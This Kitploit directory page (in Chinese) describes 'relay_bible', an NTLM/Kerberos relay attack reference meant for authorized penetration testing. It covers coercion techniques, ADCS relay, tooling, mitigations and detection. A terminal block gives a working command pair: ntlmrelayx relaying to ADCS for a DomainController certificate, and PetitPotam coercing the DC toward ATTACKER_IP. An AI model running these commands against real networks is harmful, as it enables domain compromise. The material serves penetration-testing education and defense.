Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
relay_bible — 多种中继技术参考 | Kitploit
工具/GitHubGitHub/rootsecdev/relay_bible
权限提升侦察漏洞分析漏洞利用网络安全渗透测试身份验证学习与教育红队精选资源实验室与实践
GitHub
1932253个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
rootsecdev/relay_bible

relay_bible

多种中继技术参考

查看仓库

中继圣经 — 内部渗透测试中继指南

一份全面的NTLM中继攻击参考,适用于授权内部渗透测试。涵盖身份认证基础、强制认证技术、各协议的中继目标、工具使用、高级链式攻击及防御缓解措施。

先决条件

  • Linux攻击主机(Kali、Parrot或类似系统)
  • 已安装Python 3.10+及Impacket
  • 能够访问目标环境网络(授权渗透测试)
  • 基本了解Active Directory和Windows网络

目录

1. 基础原理

  • NTLM认证与中继理论 — NTLM工作原理、为何能中继、NTLMv1与v2对比、签名、EPA
  • Kerberos认证与中继理论 — AS/TGS/AP交换、SPN规范化、为何Kerberos仍可被中继
  • 识别中继机会 — 枚举、寻找未启用签名的主机、测绘攻击面

2. 强制认证技术

  • 强制认证概述 — 迫使机器向你的监听器认证
  • PetitPotam(MS-EFSRPC)
  • PrinterBug / SpoolSample(MS-RPRN)
  • DFSCoerce(MS-DFSNM)
  • ShadowCoerce(MS-FSRVP)

3. 中继目标(按协议分)

  • SMB中继 — 中继到SMB以执行代码
  • LDAP / LDAPS中继 — 委托访问、创建机器账户、RBCD
  • MSSQL中继 — 中继到SQL Server以执行命令
  • HTTP / WebDAV中继 — 中继到Web端点、WebDAV强制认证
  • ADCS攻击(ESC1–ESC15) — 所有包含中继在内的ADCS提权技术
  • SMTP / IMAP中继 — 中继到Exchange/邮件服务
  • RPC / DCOM中继 — 中继到RPC端点
  • SOCKS代理中继 — 通过SOCKS维持持久中继会话

4. 工具配置与使用

  • Responder — 投毒与捕获哈希
  • ntlmrelayx.py — 主要中继框架
  • mitm6 — IPv6 DNS接管以强制认证
  • Certipy — ADCS枚举与中继
  • Coercer — 自动化强制认证工具
  • krbrelayx — Kerberos中继与委托滥用

5. 高级技术

  • 跨协议中继 — 从一种协议中继到另一种协议
  • IPv6攻击链 — mitm6 + 中继组合
  • 中继链式攻击与横向移动 — 多跳中继场景
  • WebDAV强制认证技巧 — 从机器强制HTTP认证
  • 通过DNS CNAME滥用的Kerberos中继 — Cymulate / CVE-2026-20929,通过CNAME投毒进行Kerberos TGS中继

6. 防御与检测

  • 缓解措施 — SMB签名、LDAP签名、EPA、禁用NTLM
  • 检测方法 — 日志源、Sigma规则、行为指标

快速参考:NTLM中继 — 哪种来源可中继到哪种目标?

适用于经典NTLM中继,在已修补(CVE-2019-1040之后)的现代环境中。更详细的跨协议分析请见跨协议中继。

* 目标不得要求SMB签名 † SMB来源的NTLM在NEGOTIATE中包含签名标志,而LDAP和ADCS HTTP强制执行签名——这会导致中继的会话要求一个攻击者没有的签名密钥。因此,对于LDAP和ADCS中继,优先选择WebDAV/HTTP来源的认证。

快速参考:通过DNS CNAME滥用的Kerberos中继

Cymulate / CVE-2026-20929 原语(2026年1月)——攻击者通过CNAME投毒DNS,Windows将SPN规范化,客户端向攻击者选择的目标请求TGS,AP-REQ被中继。由于许多服务仅根据SPN的DNS部分接受票据,因此来源SPN类别的重要性远低于NTLM中继——限制攻击的关键在于目标服务是否执行了自身的反中继控制。

所有行均假设攻击者具备网络位置以投毒DNS(通过mitm6进行DHCPv6、ARP、恶意DHCPv4)。完整技术:通过DNS CNAME滥用的Kerberos中继。

快速开始

  1. 枚举 — 找到未启用签名的主机并识别强制认证目标
  2. 部署 — 启动向目标地址的中继监听器(ntlmrelayx)
  3. 强制 — 触发源机器的认证流向你的监听器
  4. 利用 — 中继捕获并转发认证至目标协议
root@kitploit:~
# 经典示例:强制DC认证,中继到ADCS获取DC证书
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
python3 PetitPotam.py ATTACKER_IP DC_IP
下载工具
来源认证→ SMB→ LDAP→ MSSQL→ HTTP→ ADCS→ SOCKS
SMB✅*❌†✅✅❌†✅
HTTP✅*✅✅✅✅✅
WebDAV✅*✅✅✅✅✅
MSSQL✅*✅✅✅✅✅
目标服务可中继,除非...补丁/状态
SMB目标要求SMB签名—
LDAP要求LDAP签名—
LDAPSLdapEnforceChannelBinding = 2(始终)—
HTTP / IIS强制HTTP CBT(HTTP.sys令牌检查 = 要求)CVE-2026-20929 后向移植了HTTP.sys CBT
ADCS /certsrv/虚拟目录上扩展保护 = 要求通过CVE-2026-20929应用HTTP.sys CBT
MSSQL启用扩展保护—
Exchange(OWA/ECP/…)所有虚拟目录上的EPA—